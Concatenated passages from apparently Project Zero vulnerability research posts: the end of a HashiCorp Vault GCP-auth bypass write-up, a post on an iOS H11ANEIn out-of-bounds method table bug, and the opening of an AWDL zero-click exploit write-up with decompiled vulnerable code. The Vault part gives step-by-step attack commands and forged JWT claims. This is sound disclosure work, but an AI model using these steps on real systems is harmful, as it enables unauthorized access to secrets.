  • The service account in subject claim of the JWT token needs to exist. This is verified using the ServiceAccount GCP API which requires the iam.serviceAccounts.get permission in the project hosting the service account. As the attacker can just use a service account in their own project, it is straightforward to just grant this permission to the GCP identity Vault is running under or even allUsers.


Finally, AuthorizeGCE is called to grant or deny access. If the attacker impersonated a GCE instance with the right attributes (project, label, zone, ...), everything works out and the attacker gets a valid session token back. The only auth restriction that can’t be bypassed is a hardcoded service account name, as this value will be equal to the attacker's account and not the expected VM account name.


An end-to-end attack against a vulnerable configuration will look like this:

  1. Create a service account in a GCP project you control and generate a private key using gcloud: gcloud iam service-accounts keys create key.json --iam-account sa-name@project-id.iam.gserviceaccount.com

  2. Sign a JWT with a fake compute_engine claim describing an existing and privileged VM (see the example claims after this list). See here for a simple proof-of-concept script that takes care of most of the details.

  3. Now simply use the token to sign in to Vault: curl --request POST --data '{"role": "my-gce-role", "jwt" : "...."}' http://vault:8200/v1/auth/gcp/login
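
For illustration, the decoded claims of such a forged token might look like this (all values here are hypothetical: sub is the attacker-owned service account, the aud format is role-specific, and the compute_engine section describes the victim VM):

{"sub": "attacker-sa@attacker-project.iam.gserviceaccount.com",
 "aud": "vault/my-gce-role",
 "iat": 1594641932, "exp": 1594645532,
 "google": {"compute_engine": {"project_id": "victim-prod-project", "zone": "europe-west3-c", "instance_name": "vault", "instance_creation_timestamp": 1594641932, "instance_id": "1234567890"}}}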


This is an interesting bug that requires some knowledge of GCP IAM to spot. The root cause seems to be the merging of two separate authentication flows into a single code path in the parseAndValidateJwt function, which makes it difficult to reason about all security requirements when writing or reviewing the code. At the same time, GCP makes it easy to shoot yourself in the foot by offering two types of JWT tokens with completely different security properties.

Conclusion

This blog post describes two authentication vulnerabilities in HashiCorp Vault, a “cloud-native” secret management solution. While Vault was clearly developed with security in mind and profits from the memory safety and high-quality standard library of its implementation language Go, I was still able to identify two critical vulnerabilities in its unauthenticated attack surface.


In my experience, tricky vulnerabilities like this often exist where developers have to interact with external systems and services. A strong developer might be able to reason about all security boundaries, requirements and pitfalls of their own software, but it becomes very difficult once a complex external service comes into play. Modern cloud IAM solutions are powerful and often more secure than comparable on-premise solutions, but they come with their own security pitfalls and a high implementation complexity. As more and more companies move to the big cloud providers, familiarity with these technology stacks will become a key skill for security engineers and researchers, and it is safe to assume that there will be a lot of similar issues in the next few years.


Finally, both discussed vulnerabilities demonstrate how difficult it is to write secure software. Even with memory-safe languages, strong cryptography primitives, static analysis and large fuzzing infrastructure, some issues can only be discovered by manual code review and an attacker mindset.


Oops, I missed it again!

Written by Brandon Azad, while working at Project Zero


This is a quick anecdotal post describing one of the more frustrating aspects of vulnerability research: realizing that you missed a bug that was staring you in the face only once you see the patched version!

Some suspicious code

After writing the oob_timestamp exploit, I spent some time trying to find another vulnerability to exploit. Typically, it's a lot easier to develop an exploit when you already have a research platform (read: another exploit) available to help with your analysis, for example by dumping kernel memory to ensure that your heap spray is placing objects at their intended locations. Developing an exploit blind, as I had done with voucher_swap, is much trickier. (For oob_timestamp, I relied on checkra1n to bootstrap the exploit on A11, and later expanded it to A13.) So, I thought it might be nice to chain my next exploit off of oob_timestamp to avoid having to re-bootstrap later.


As I had already spent a fair amount of time reversing the iOS 13.3 (17C54) kernelcache for oob_timestamp, I decided to continue that effort on a new user client. I wrote a small program to enumerate IOUserClient classes reachable from the app sandbox (inadvertently discovering another bug in the process) and looked for classes that I had not researched previously.


A quick primer for those less familiar with Apple kernels: Apple's kernel is called XNU, and IOKit is XNU's C++ framework for implementing drivers. An app in userspace can call IOServiceGetMatchingServices() to get handles to the drivers, but the app can't actually do much with the raw driver handle. Instead, the app needs to direct the driver to create a "user client" by calling IOServiceOpen(), passing the type of user client it wants. Since the user client is what provides most of the functionality to userspace, this is the step that is subject to a sandbox check, ensuring that the app is allowed to open the requested type of user client. Once the app has a handle to a user client for the driver, the app can interact with the user client by calling functions like IOConnectCallMethod() on the user client handle, specifying the "selector" (index) of the method the app wants to invoke. In the kernel, IOConnectCallMethod() will use the selector to index a table of methods provided by the user client, invoking the one requested.


As I was scanning for user clients I could open, one reachable class stood out: H11ANEInDirectPathClient, a user client of the H11ANEIn driver. I hadn't seen this class before, but some quick Googling showed that it wasn't open source, which suggested to me that the code had probably undergone substantially less security review, and hence probably had more low-hanging bugs in it, than the open-source parts of the kernel.


I discovered several interesting things in the process of reversing. First, H11ANEIn appeared to actually have 2 user clients: H11ANEInDirectPathClient (the one I had opened) and H11ANEInUserClient (which I could not open in the sandbox). Reading the strings in the method H11ANEIn::newUserClient(), it appeared that H11ANEInDirectPathClient is the less privileged version of H11ANEInUserClient, so it made sense that I could open the former but not the latter.


if ( type == 1 ) // H11ANEInDirectPathClient
{
    _os_log_internal(...,
        "%s : ... : Creating direct evaluate client\n",
        "virtual IOReturn H11ANEIn::newUserClient(...)");
    ...
}
else // H11ANEInUserClient
{
    _os_log_internal(...,
        "%s : ... : Creating default full-entitlement client\n",
        "virtual IOReturn H11ANEIn::newUserClient(...)");
    ...
}


The traditional starting point when looking for bugs in IOKit user clients is to look at the external methods that are provided. These are usually identifiable as tables of function pointers near the user client's vtable in the kernelcache image. Here are the external method tables I identified for the two user clients, curiously laid out back-to-back in the kernelcache rather than each near their respective vtable:



Also, I noticed something interesting when I looked at the cross-references to these two tables: it seemed like since the classes were basically identical except for one being a less-privileged version of the other, Apple had made the rather unusual decision to share the parts of the external method tables corresponding to shared functionality between the two user client types!


This was evident from how the ::externalMethod() methods of each user client accessed the overlapping parts of the external method tables. The H11ANEInDirectPathClient version:


int H11ANEInDirectPathClient::externalMethod(H11ANEInDirectPathClient *this, u32 selector, IOExternalMethodArguments *args, IOExternalMethodDispatch *method, void *target)
{
    if ( !target )
        target = this;
    if ( selector <= 33 )
        method = &H11ANEInDirectPathClient_ExternalMethods_34[selector];
    return IOUserClient::externalMethod(this, selector, args, method, target);
}


And the H11ANEInUserClient version:


int H11ANEInUserClient::externalMethod(H11ANEInUserClient *this, u32 selector, IOExternalMethodArguments *args, IOExternalMethodDispatch *method, void *target)
{
    if ( !target )
        target = this;
    if ( selector <= 33 )
        method = &H11ANEInUserClient_ExternalMethods_34[selector];
    return IOUserClient::externalMethod(this, selector, args, method, target);
}


Since each can access 34 methods and the first 3 in the array are reserved for H11ANEInDirectPathClient, this meant that the last 3 would be reserved for H11ANEInUserClient, which seemed to check out since there were 37 methods total. Neat.


So, I started digging into the methods accessible by H11ANEInDirectPathClient, and very quickly adopted the opinion that the code quality in this driver was not very high. For example, I found that the 3500-line method H11ANEIn::ANE_ProgramSendRequest_gated(), reachable through selectors 2 and 33, exhibited some pretty trivial out-of-bounds reads right at the top of the function:



Here, the content of args is fully controlled, so the args->totInputBuffers count can be arbitrarily high, past the ends of the inputBufferSymbolIndex and inputBufferSurfaceId arrays.


Since the code quality seemed to be low, and since I was not particularly keen on untangling multi-thousand-line functions, I also tried to perform some very trivial fuzzing. My fuzzing experience was quite limited, but I had long ago written a dumb fuzzer that just blindly calls IOConnectCallMethod() from userspace passing randomly generated values; surprisingly, this had been sufficient before to find real kernel vulnerabilities. So, I decided to revive that old fuzzer and point it at H11ANEInDirectPathClient.


Within one second of launching the fuzzer app, the device panicked.


I was of course quite excited at this development, but it turned out that the bug was a pretty trivial NULL pointer dereference, not exploitable on iOS. And further fuzzing didn't seem to trigger anything else interesting. So, with other more interesting projects mounting, I sent a quick non-security report to Apple noting that this area of the code could be problematic, and then turned away from H11ANEInDirectPathClient.

Once more, with symbols

Fast forward to the end of August.


As had happened before with the iOS 12 beta, Apple had accidentally included a symbolicated kernelcache in some of the iOS 14 beta releases. I hadn't had a chance to dig into them yet, but I figured that the addition of symbols (and in particular the limited type information that could be inferred from mangled C++ method names) would make reversing the web of multi-thousand-line H11ANEIn functions faster and thus more worthwhile. So, I opened IDA and jumped once again to the external method tables to see if there were any obvious changes.


But almost immediately, something about the external method tables caught my eye:



Oddly, the external method tables for both H11ANEInDirectPathClient and H11ANEInUserClient had defined symbols. This was weird: I had expected the code would consist of a single array of IOExternalMethodDispatch structs, so that H11ANEInDirectPathClient could claim the 34 methods starting at index 0 while H11ANEInUserClient could claim the 34 methods starting at index 3. In such an arrangement, there should only be one symbol, that for the array as a whole.


Then it dawned on me: my notion of overlapping external method arrays was nonsense, and the "sharing" of external methods was a simple out-of-bounds access by H11ANEInDirectPathClient! The less privileged client was supposed to only have 3 methods, but it just so happened that there was a typo in the bounds-check, allowing H11ANEInDirectPathClient to access and call external methods from the more privileged client. And in so doing, each call by H11ANEInDirectPathClient to an H11ANEInUserClient method was implicitly triggering a type confusion on the this pointer!


In hindsight, I realized that the "sharing external method arrays" arrangement made no sense: any such use would have to be careful to avoid type confusion between the two classes of user clients, and no such precaution was taking place. This conviction was confirmed when I decompiled H11ANEInDirectPathClient::externalMethod() in the new kernelcache and saw that the bounds check on the selector had decreased from 33 to 2, meaning the bug was now patched.


So, I had missed an issue staring me in the face the whole time, whose existence I had justified by inventing a concept of overlapping method tables. And of course, to add insult to injury, the NULL pointer dereferences I had reported as a non-security issue were only reached by calling two of the out-of-bounds methods.

Another recipe for copypasta

How might this bug have come to exist in the first place? Since the buggy version included the same bounds check for both ::externalMethod() implementations, I suspect this was another case of a copy-paste bug. Here's my guess for what H11ANEInUserClient::externalMethod() actually looks like in Apple's source:


IOReturn H11ANEInUserClient::externalMethod(
    u32 selector, IOExternalMethodArguments *args,
    IOExternalMethodDispatch *method, void *target)
{
    if ( !target )
        target = this;
    if ( selector < H11ANEInUserClient::sMethodCount )
        method = &H11ANEInUserClient::sMethods[selector];
    return super::externalMethod(this, selector, args, method, target);
}


My guess is that this code was copy-pasted to create the H11ANEInDirectPathClient version, but the author accidentally forgot to change the type name in the selector check:


IOReturn H11ANEInDirectPathClient::externalMethod(
    u32 selector, IOExternalMethodArguments *args,
    IOExternalMethodDispatch *method, void *target)
{
    if ( !target )
        target = this;
    if ( selector < H11ANEInUserClient::sMethodCount )
        method = &H11ANEInDirectPathClient::sMethods[selector];
    return super::externalMethod(this, selector, args, method, target);
}


Aside from that, it's mostly a convenient accident that the compiler laid the external method tables back-to-back, making this bug plausibly exploitable (as opposed to past cases of out-of-bounds external methods that I'm aware of). That said, I have not examined the actual exploitability of this issue.

Conclusion

So, what are the takeaways from this story?


First, it's really easy to miss bugs, even ones that you feel should have been obvious. I kicked myself for missing this, given the mental gymnastics I went through to justify why a code pattern like this could exist in the first place. If there's one lesson I've had to teach myself again and again, it's to be inherently suspicious of code and to never assume that it's doing what it does on purpose.


Second, copy-paste is a really quick way to create code, but it's also a quick way to create subtle bugs that, by their nature, are tricky to spot by glancing at the source code. It's easy to tell that 2 arrays are "overlapping" by looking in a disassembler, but it's harder to see that the wrong one of two very similar class names was used in copy-pasted code. While it doesn't solve the problem 100%, it can help to decompose copy-pasted code patterns into reusable helper functions.


Finally, even though I only realized that there was a bug when I looked at the symbolicated kernelcache, I don't want Apple to get the impression that releasing symbols is a security risk. Security researchers rejoice when Apple accidentally releases symbolicated kernelcaches or development libraries, but this is just because it saves time reversing, not because it makes things newly reversible. Any capable attacker will find bugs regardless of the presence or absence of symbols; all the lack of symbols does is keep the bug away from eyes (like mine) that might report it. Hence, withholding symbols is an incredibly weak protection, only deterring the lowest tiers of attackers and serving to make the bugs that have been found last longer.


An iOS zero-click radio proximity exploit odyssey

Posted by Ian Beer, Project Zero


NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 13.5 in May 2020.


In this demo I remotely trigger an unauthenticated kernel memory corruption vulnerability which causes all iOS devices in radio-proximity to reboot, with no user interaction. Over the next 30'000 words I'll cover the entire process to go from this basic demo to successfully exploiting this vulnerability in order to run arbitrary code on any nearby iOS device and steal all the user data.

Introduction

Quoting @halvarflake's OffensiveCon keynote from February 2020:


"Exploits are the closest thing to "magic spells" we experience in the real world: Construct the right incantation, gain remote control over device."


For 6 months of 2020, while locked down in the corner of my bedroom surrounded by my lovely, screaming children, I've been working on a magic spell of my own. No, sadly not an incantation to convince the kids to sleep in until 9am every morning, but instead a wormable radio-proximity exploit which allows me to gain complete control over any iPhone in my vicinity. View all the photos, read all the email, copy all the private messages and monitor everything which happens on there in real-time. 


The takeaway from this project should not be: no one will spend six months of their life just to hack my phone, I'm fine.


Instead, it should be: one person, working alone in their bedroom, was able to build a capability which would allow them to seriously compromise iPhone users they'd come into close contact with.


Imagine the sense of power an attacker with such a capability must feel. As we all pour more and more of our souls into these devices, an attacker can gain a treasure trove of information on an unsuspecting target.


What's more, with directional antennas, higher transmission powers and sensitive receivers the range of such attacks can be considerable.


I have no evidence that these issues were exploited in the wild; I found them myself through manual reverse engineering. But we do know that exploit vendors seemed to take notice of these fixes. For example, take this tweet from Mark Dowd, the co-founder of Azimuth Security, an Australian "market-leading information security business":



This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL


The vulnerability Mark is referencing here is one of the vulnerabilities I reported to Apple. You don't notice a fix like that without having a deep interest in this particular code.


This Vice article from 2018 gives a good overview of Azimuth and why they might be interested in such vulnerabilities. You might trust that Azimuth's judgement of their customers aligns with your personal and political beliefs, or you might not; that's not the point. Unpatched vulnerabilities aren't like physical territory, occupied by only one side. Everyone can exploit an unpatched vulnerability, and Mark Dowd wasn't the only person to start tweeting about vulnerabilities in AWDL.


This has been the longest solo exploitation project I've ever worked on, taking around half a year. But it's important to emphasize up front that the teams and companies supplying the global trade in cyberweapons like this one aren't typically just individuals working alone. They're well-resourced and focused teams of collaborating experts, each with their own specialization. They aren't starting with absolutely no clue how bluetooth or wifi work. They also potentially have access to information and hardware I simply don't have, like development devices, special cables, leaked source code, symbols files and so on.


Of course, an iPhone isn't designed to allow people to build capabilities like this. So what went so wrong that it was possible? Unfortunately, it's the same old story. A fairly trivial buffer overflow programming error in C++ code in the kernel parsing untrusted data, exposed to remote attackers.


In fact, this entire exploit uses just a single memory corruption vulnerability to compromise the flagship iPhone 11 Pro device. With just this one issue I was able to defeat all the mitigations in order to remotely gain native code execution and kernel memory read and write.


Relative to the size and complexity of the codebases of major tech companies, the security teams dedicated to proactively auditing their products' source code for vulnerabilities are very small. Android and iOS are complete custom tech stacks: it's not just kernels and device drivers but dozens of attacker-reachable apps, hundreds of services and thousands of libraries running on devices with customized hardware and firmware.


Actually reading all the code, including every new line in addition to the decades of legacy code, is unrealistic, at least with the division of resources commonly seen in tech where the ratio of security engineers to developers might be 1:20, 1:40 or even higher.


To tackle this insurmountable challenge, security teams rightly place a heavy emphasis on design level review of new features. This is sensible: getting stuff right at the design phase can help limit the impact of the mistakes and bugs which will inevitably occur. For example, ensuring that a new hardware peripheral like a GPU can only ever access a restricted portion of physical memory helps constrain the worst-case outcome if the GPU is compromised by an attacker. The attacker is hopefully forced to find an additional vulnerability to "lengthen the exploit chain", having to use an ever-increasing number of vulnerabilities to hack a single device. Retrofitting constraints like this to already-shipping features would be much harder, if not impossible.


In addition to design-level reviews, security teams tackle the complexity of their products by attempting to constrain what an attacker might be able to do with a vulnerability. These are mitigations. They take many forms and can be general, like stack cookies, or application-specific, like Structure ID in JavaScriptCore. The guarantees which can be made by mitigations are generally weaker than those made by design-level features, but the goal is similar: to "lengthen the exploit chain", hopefully forcing an attacker to find a new vulnerability and incur some cost.


The third approach widely used by defensive teams is fuzzing, which attempts to emulate an attacker's vulnerability finding process with brute force. Fuzzing is often misunderstood as an effective method to discover easy-to-find vulnerabilities or "low-hanging fruit". A more precise description would be that fuzzing is an effective method to discover easy-to-fuzz vulnerabilities. Plenty of vulnerabilities which a skilled vulnerability researcher would consider low-hanging fruit can require reaching a program point that no fuzzer today will be able to reach, no matter the compute resources used.


The problem for tech companies, and it's certainly not unique to Apple, is that while design review, mitigations, and fuzzing are necessary for building secure codebases, they are far from sufficient.


Fuzzers cannot reason about code in the same way a skilled vulnerability researcher can. This means that without concerted manual effort, vulnerabilities with a relatively low cost-of-discovery remain fairly prevalent. A major focus of my work over the last few years had been attempting to highlight that the iOS codebase, just like any other major modern operating system, has a high vulnerability density. Not only that, but there's a high density of "good bugs", that is, vulnerabilities which enable the creation of powerful weird machines.


This notion of "good bugs" is something that offensive researchers understand intuitively but something which might be hard to grasp for those without an exploit development background. Thomas Dullien's weird machines paper provides the best introduction to the notion of weird machines and their applicability to exploitation. Given a sufficiently complex state machine operating on attacker-controlled input, a "good bug" allows the attacker-controlled input to instead become "code", with the "good bug" introducing a new, unexpected state transition into a new, unintended state machine. The art of exploitation then becomes the art of determining how one can use vulnerabilities to introduce sufficiently powerful new state transitions such that, as an end goal, the attacker-supplied input becomes code for a new, weird machine capable of arbitrary system interactions.


It's with this weird machine that mitigations will be defeated; even a mitigation without implementation flaws is usually no match for a sufficiently powerful weird machine. An attacker looking for vulnerabilities is looking specifically for weird machine primitives. Their auditing process is focused on a particular attack-surface and particular vulnerability classes. This stands in stark contrast to a product security team with responsibility for every possible attack surface and every vulnerability class.


As things stand now in November 2020, I believe it's still quite possible for a motivated attacker with just one vulnerability to build a sufficiently powerful weird machine to completely, remotely compromise top-of-the-range iPhones. In fact, the parts of that process which are hardest probably aren't those which you might expect, at least not without an appreciation for weird machines.


Vulnerability discovery remains a fairly linear function of time invested. Defeating mitigations remains a matter of building a sufficiently powerful weird machine. Concretely, Pointer Authentication Codes (PAC) meant I could no longer take the popular direct shortcut to a very powerful weird machine via trivial program counter control and ROP or JOP. Instead, I built a remote arbitrary memory read and write primitive which in practice is just as powerful and something which the current implementation of PAC, which focuses almost exclusively on restricting control-flow, wasn't designed to mitigate.


Secure system design didn't save the day because of the inevitable tradeoffs involved in building shippable products. Should such a complex parser driving multiple, complex state machines really be running in kernel context against untrusted, remote input? Ideally, no, and this was almost certainly flagged during a design review. But there are tight timing constraints for this particular feature which means isolating the parser is non-trivial. It's certainly possible, but that would be a major engineering challenge far beyond the scope of the feature itself. At the end of the day, it's features which sell phones and this feature is undoubtedly very cool; I can completely understand the judgement call which was made to allow this design despite the risks.


But risk means there are consequences if things don't go as expected. When it comes to software vulnerabilities it can be hard to connect the dots between those risks which were accepted and the consequences. I don't know if I'm the only one who found these vulnerabilities, though I'm the first to tell Apple about them and work with Apple to fix them. Over the next 30'000 words I'll show you what I was able to do with a single vulnerability in this attack surface and hopefully give you a new or renewed insight into the power of the weird machine.


I don't think all hope is lost; there's just an awful lot more left to do. In the conclusion I'll try to share some ideas for what I think might be required to build a more secure iPhone.


If you want to follow along you can find details attached to issue 1982 in the Project Zero issue tracker.

Vulnerability discovery

In 2018 Apple shipped an iOS beta build without stripping function name symbols from the kernelcache. While this was almost certainly an error, events like this help researchers on the defending side enormously. One of the ways I like to procrastinate is to scroll through this enormous list of symbols, reading bits of assembly here and there. One day I was looking through IDA's cross-references to memmove with no particular target in mind when something jumped out as being worth a closer look:


IDA Pro's cross references window shows a large number of calls to memmove. A callsite in IO80211AWDLPeer::parseAwdlSyncTreeTLV is highlighted


Having function names provides a huge amount of missing context for the vulnerability researcher. A completely stripped 30+MB binary blob such as the iOS kernelcache can be overwhelming. There's a huge amount of work to determine how everything fits together. What bits of code are exposed to attackers? What sanity checking is happening and where? What execution context are different parts of the code running in?


In this case this particular driver is also available on MacOS, where function name symbols are not stripped.


There are three things which made this highlighted function stand out to me:


1) The function name:


IO80211AWDLPeer::parseAwdlSyncTreeTLV


At this point, I had no idea what AWDL was. But I did know that TLVs (Type, Length, Value) are often used to give structure to data, and parsing a TLV might mean it's coming from somewhere untrusted. And the 80211 is a giveaway that this probably has something to do with WiFi. Worth a closer look. Here's the raw decompilation from Hex-Rays which we'll clean up later:


__int64 __fastcall IO80211AWDLPeer::parseAwdlSyncTreeTLV(__int64 this, __int64 buf)
{
  const void *v3; // x20
  _DWORD *v4; // x21
  int v5; // w8
  unsigned __int16 v6; // w25
  unsigned __int64 some_u16; // x24
  int v8; // w21
  __int64 v9; // x8
  __int64 v10; // x9
  unsigned __int8 *v11; // x21

  v3 = (const void *)(buf + 3);
  v4 = (_DWORD *)(this + 1203);
  v5 = *(_DWORD *)(this + 1203);
  if ( ((v5 + 1) & 0xFFFFu) <= 0xA )
    v6 = v5 + 1;
  else
    v6 = 10;
  some_u16 = *(unsigned __int16 *)(buf + 1) / 6uLL;
  if ( (_DWORD)some_u16 == v6 )
  {
    some_u16 = v6;
  }
  else
  {
    IO80211Peer::logDebug(
      this,
      0x8000000000000uLL,
      "Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u \n",
      *(unsigned __int8 *)(this + 32),
      *(unsigned __int8 *)(this + 33),
      *(unsigned __int8 *)(this + 34),
      *(unsigned __int8 *)(this + 35),
      *(unsigned __int8 *)(this + 36),
      *(unsigned __int8 *)(this + 37),
      v6,
      some_u16);
    *v4 = some_u16;
    v6 = some_u16;
  }
  v8 = memcmp((const void *)(this + 5520), v3, (unsigned int)(6 * some_u16));
  memmove((void *)(this + 5520), v3, (unsigned int)(6 * some_u16));

Definitely looks like it's parsing something. There's some fiddly byte manipulation; something which sort of looks like a bounds check and an error message.


2) The second thing which stands out is the error message string:


"Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u\n" 


Any kind of LENGTH error sounds like fun to me. Especially when you look a little closer...


3) The control flow graph.


Reading the code a bit more closely it appears that although the log message contains the word "error" there's nothing which is being treated as an error condition here. IO80211Peer::logDebug isn't a fatal logging API, it just logs the message string. Tracing back the length value which is passed to memmove, regardless of which path is taken we still end up with what looks like an arbitrary u16 value from the input buffer (rounded down to the nearest multiple of 6) passed as the length argument to memmove.


Can it really be this easy? Typically, in my experience, bugs this shallow in real attack surfaces tend to not work out. There's usually a length check somewhere far away; you'll spend a few days trying to work out why you can't seem to reach the code with a bad size until you find it and realize this was a CVE from a decade ago. Still, worth a try.


But what even is this attack surface?

A first proof-of-concept

A bit of googling later, we learn that awdl is a type of Welsh poetry, and also an acronym for an Apple-proprietary mesh networking protocol probably called Apple Wireless Direct Link. It appears to be used by AirDrop amongst other things.


The first goal is to determine whether we can really trigger this vulnerability remotely.


We can see from the casts in the parseAwdlSyncTreeTLV method that the type-length-value objects have a single-byte type then a two-byte length followed by a payload value.
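
As a sketch of that layout (written in Go for brevity, and assuming a little-endian length field, consistent with the u16 load at buf+1 on ARM64):

package awdl

import "encoding/binary"

// parseTLV splits one type-length-value object off the front of buf:
// a one-byte type, a two-byte little-endian length, then the payload.
// Unlike the vulnerable code, this sketch validates the length field
// against the size of the buffer before slicing.
func parseTLV(buf []byte) (typ uint8, value, rest []byte, ok bool) {
	if len(buf) < 3 {
		return 0, nil, nil, false
	}
	length := int(binary.LittleEndian.Uint16(buf[1:3]))
	if 3+length > len(buf) {
		return 0, nil, nil, false
	}
	return buf[0], buf[3 : 3+length], buf[3+length:], true
}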


In IDA selecting the function name and going View -> Open subviews -> Cross references (or pressing 'x') shows IDA only found one caller of this method:


IO80211AWDLPeer::actionFrameReport
...
      case 0x14u:
        if (v109[20] >= 2)
          goto LABEL_126;
        ++v109[0x14];
        IO80211AWDLPeer::parseAwdlSyncTreeTLV(this, bytes);


So 0x14 is probably the type value, and v109 looks like it's probably counting the number of these TLVs.


Looking in the list of function names we can also see that there's a corresponding BuildSyncTreeTlv method. If we could get two machines to join an AWDL network, could we just use the MacOS kernel debugger to make the SyncTree TLV very large before it's sent?


Yes, you can. Using two MacOS laptops and enabling AirDrop on both of them I used a kernel debugger to edit the SyncTree TLV sent by one of the laptops, which caused the other one to kernel panic due to an out-of-bounds memmove.


If you're interested in exactly how to do that take a look at the original vulnerability report I sent to Apple on November 29th 2019. This vulnerability was fixed as CVE-2020-3843 on January 28th 2020 in iOS 13.3.1/MacOS 10.15.3.


Our journey is only just beginning. Getting from here to running an implant on an iPhone 11 Pro with no user interaction is going to take a while...

Prior Art

There is a series of papers from the Secure Mobile Networking Lab at TU Darmstadt in Germany (also known as SEEMOO) which look at AWDL. The researchers there have done a considerable amount of reverse engineering (in addition to having access to some leaked Broadcom source code) to produce these papers; they are invaluable for understanding AWDL and pretty much the only resources out there.


The first paper One Billion Apples’ Secret Sauce: Recipe for the Apple Wireless Direct Link Ad hoc Protocol covers the format of the frames used by AWDL and the operation of the channel-hopping mechanism.


The second paper A Billion Open Interfaces for Eve and Mallory: MitM, DoS, and Tracking Attacks on iOS and macOS Through Apple Wireless Direct Link focuses more on AirDrop, one of the OS features which uses AWDL. This paper also examines how AirDrop uses Bluetooth Low Energy advertisements to enable AWDL interfaces on other devices.


The research group wrote an open source AWDL client called OWL (Open Wireless Link). Although I was unable to get OWL to work it was nevertheless an invaluable reference and I did use some of their frame definitions.

What is AWDL?

AWDL is an Apple-proprietary mesh networking protocol designed to allow Apple devices like iPhones, iPads, Macs and Apple Watches to form ad-hoc peer-to-peer mesh networks. Chances are that if you own an Apple device you're creating or connecting to these transient mesh networks multiple times a day without even realizing it.


If you've ever used AirDrop, streamed music to your HomePod or Apple TV via AirPlay, or used your iPad as a secondary display with Sidecar, then you've been using AWDL. And even if you haven't been using those features, if people nearby have been, then it's quite possible your device joined the AWDL mesh network they were using anyway.


AWDL isn't a custom radio protocol; the radio layer is WiFi (specifically 802.11g and 802.11a). 


Most people's experience with WiFi involves connecting to an infrastructure network. At home you might plug a WiFi access point into your modem which creates a WiFi network. The access point broadcasts a network name and accepts clients on a particular channel.


To reach other devices on the internet you send WiFi frames to the access point (1). The access point sends them to the modem (2) and the modem sends them to your ISP (3,4) which sends them to the internet:



The topology of a typical home network


To reach other devices on your home WiFi network you send WiFi frames to the access point and the access point relays them to the other devices:


WiFi clients communicate via an access point, even if they are within WiFi range of each other


In reality the wireless signals don't propagate as straight lines between the client and access point but spread out in space such that the two client devices may be able to see the frames transmitted by each other to the access point.


If WiFi client devices can already send WiFi frames directly to each other, then why have the access point at all? Without the complexity of the access point you could certainly have much more magical experiences which "just work", requiring no physical setup.


There are various protocols for doing just this, each with their own tradeoffs. Tunneled Direct Link Setup (TDLS) allows two devices already on the same WiFi network to negotiate a direct connection to each other such that frames won't be relayed by the access point.


Wi-Fi Direct allows two devices not already on the same network to establish an encrypted peer-to-peer Wi-Fi network, using WPS to bootstrap a WPA2-encrypted ad-hoc network.


Apple's AWDL doesn't require peers to already be on the same network to establish a peer-to-peer connection, but unlike Wi-Fi Direct, AWDL has no built-in encryption. Unlike TDLS and Wi-Fi Direct, AWDL networks can contain more than two peers and they can also form a mesh network configuration where multiple hops are required.


AWDL has one more trick up its sleeve: an AWDL client can be connected to an AWDL mesh network and a regular AP-based infrastructure network at the same time, using only one Wi-Fi chipset and antenna. To see how that works we need to look a little more at some Wi-Fi fundamentals.



                                     TDLS    Wi-Fi Direct    AWDL

Requires AP network                  Yes     No              No

Encrypted                            Yes     Yes             No

Peer Limit                           2       2               Unlimited

Concurrent AP Connection Possible    No      No              Yes

WiFi fundamentals

There are over 20 years of WiFi standards spanning different frequency ranges of the electromagnetic spectrum, from as low as 54 MHz in 802.11af up to over 60 GHz in 802.11ad. Such networks are quite esoteric though; consumer equipment uses frequencies near 2.4 GHz or 5 GHz. Ranges of frequencies are split into channels: for example in 802.11g channel 6 means a 22 MHz range between 2.426 GHz and 2.448 GHz.


Newer 5 GHz standards like 802.11ac allow for wider channels up to 160 MHz; 5 GHz channel numbers therefore encode both the center frequency and channel width. Channel 44 is a 20 MHz range between 5.210 GHz and 5.230 GHz whereas channel 46 is a 40 MHz range which starts at the same lower frequency as channel 44 (5.210 GHz) but extends up to 5.250 GHz.
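

To make the numbering concrete, here's a minimal sketch of the standard channel-to-center-frequency arithmetic for 20 MHz channels (this is plain IEEE channel math, not code from AWDL):


#include <stdint.h>

// 2.4 GHz band: channels 1-13 are spaced 5 MHz apart starting at 2412 MHz.
// 5 GHz band: center frequency is 5000 MHz + 5 MHz * channel number.
uint32_t channel_center_mhz(uint32_t channel) {
  if (channel >= 1 && channel <= 13) {
    return 2407 + 5 * channel;  // channel 6 -> 2437 MHz
  }
  return 5000 + 5 * channel;    // channel 44 -> 5220 MHz
}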


AWDL typically sends and receives frames on channels 6 and 44. How does that work if you're also using your home WiFi network on a different channel?

Channel Hopping and Time Division Multiplexing

In order to appear to be connected to two separate networks on separate frequencies at the same time, AWDL-capable devices split time into 16ms chunks and tell the WiFi controller chip to quickly switch between the channel for the infrastructure network and the channel being used by AWDL:



A typical AWDL channel hopping sequence, alternating between small periods on AWDL social channels and longer periods on the AP channel


The actual channel sequence is dynamic. Peers broadcast their channel sequences and adapt their own sequence to match peers with which they wish to communicate. The periods when an AWDL peer is listening on an AWDL channel are known as Availability Windows.


In this way the device can appear to be connected to the access point whilst also participating in the AWDL mesh at the same time. Of course, frames might be missed from both the AP and the AWDL mesh but the protocols are treating radio as an unreliable transport anyway so this only really has an impact on throughput. A large part of the AWDL protocol involves trying to synchronize the channel switching between peers to improve throughput.


The SEEMOO labs paper has a much more detailed look at the AWDL channel hopping mechanism.

AWDL frames

These are the first software-controlled fields which go over the air in a WiFi frame:


struct ieee80211_hdr {

  uint16_t frame_control;

  uint16_t duration_id;

  struct ether_addr dst_addr;

  struct ether_addr src_addr;

  struct ether_addr bssid_addr;

  uint16_t seq_ctrl;

} __attribute__((packed));


The first word contains fields which define the type of this frame. These are broadly split into three frame families: Management, Control and Data. The building blocks of AWDL use a subtype of Management frames called Action frames.


The address fields in an 802.11 header can have different meanings depending on the context; for our purposes the first is the destination device MAC address, the second is the source device MAC and the third is the MAC address of the infrastructure network access point or BSSID.


Since AWDL is a peer-to-peer network and doesn't use an access point, the BSSID field of an AWDL frame is set to the hard-coded AWDL BSSID MAC of 00:25:00:ff:94:73. It's this BSSID which AWDL clients are looking for when they're trying to find other peers. Your router won't accidentally use this BSSID because Apple owns the 00:25:00 OUI.
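

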